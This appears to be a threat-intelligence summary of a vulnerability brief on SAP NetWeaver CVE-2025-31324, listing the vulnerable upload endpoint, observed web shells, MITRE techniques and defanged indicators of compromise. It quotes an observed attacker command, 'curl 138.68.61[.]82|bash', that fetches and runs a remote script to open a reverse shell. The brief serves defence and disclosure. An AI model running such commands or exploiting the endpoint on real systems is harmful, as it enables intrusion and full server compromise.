A critical SAP NetWeaver vulnerability (CVE-2025-31324) allows unauthenticated attackers to upload malicious files, enabling remote code execution and full system compromise via web shells and reverse shells. Immediate remediation and detection are essential. (Affected: SAP NetWeaver application servers, enterprise IT systems)
Keypoints :
- CVE-2025-31324 is a critical file upload vulnerability in SAP NetWeaver Visual Composer Framework (VCFRAMEWORK) version 7.50.
- The vulnerability enables unauthenticated attackers to upload arbitrary files through the /developmentserver/metadatauploader endpoint.
- Successful exploitation leads to remote code execution and full system compromise.
- Attackers deploy JSP web shells like helper.jsp, cache.jsp, ran.jsp for persistent access.
- Observed post-exploit activity includes reconnaissance commands and deployment of reverse shell tools such as GOREVERSE and reverse SSH SOCKS proxies.
- Malicious payloads and tools downloaded from multiple suspicious IPs and domains, including ocr-freespace.oss-cn-beijing.aliyuncs[.]com.
- Palo Alto Networks products provide layered defenses via NGFW signatures, Cortex Xpanse discovery, Cortex XDR/XSIAM anti-webshell protections, and URL/DNS filtering.
- Indicators of Compromise include multiple suspicious IP addresses, domain names, and hashed payloads related to web shells and reverse shells.
- Exploitation activity increased notably after vulnerability disclosure in April 2025.
- Organizations are urged to apply patches, monitor exposures, and leverage incident response resources for mitigation.
MITRE Techniques :
- Exploitation for Client Execution (T1203) – Attackers exploit the file upload vulnerability on the /developmentserver/metadatauploader endpoint to execute code.
- Initial Access via Exploit Public-Facing Application (T1190) – Leverages vulnerable SAP NetWeaver public-facing application to gain unauthorized access.
- Web Shell (T1505.003) – Deployment and use of JSP web shells (e.g., helper.jsp, cache.jsp, ran.jsp) for persistent command execution.
- Command and Scripting Interpreter (T1059) – Execution of OS commands via web shells and PowerShell scripts on the compromised servers.
- Remote File Copy (T1105) – Download of malicious payloads and scripts from attacker-controlled infrastructure.
- Internal Reconnaissance (T1083) – Execution of system and network information gathering commands post-compromise.
- Proxy (T1090) – Use of reverse SSH SOCKS proxy to tunnel traffic and maintain remote access.
- Obfuscated Files or Information (T1027) – Use of obfuscated binaries and encoded PowerShell scripts for stealthy payload delivery.
- Scheduled Task/Job (T1053) – Potential use of scheduled tasks via crontab enumeration and modification for persistence.
Indicator of Compromise :
- The article includes IP addresses associated with Command and Control servers, such as 47.97.42[.]177 (GOREVERSE C2) and 45.76.93[.]60 (Reverse SSH proxy C2).
- Multiple domain names serve malicious payloads or scripts, e.g., ocr-freespace.oss-cn-beijing.aliyuncs[.]com and d-69b.pages[.]dev.
- Hashes of various malicious files and web shells are provided, including JSP web shells (e.g., helper.jsp SHA256: 598b38f44564565e0e76aa604f915ad88a20a8d5b5827151e681c8866b7ea8b0) and reverse shell binaries (e.g., GOREVERSE hash: 888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef).
- Commands used to download and execute malicious payloads via PowerShell or curl, e.g., ‘curl 138.68.61[.]82|bash’ establishing reverse shells.
- The presence of suspicious files named ansgdhs.bat and other artifacts indicating lateral movement or payload deployment.
Read more: https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/
Views: 39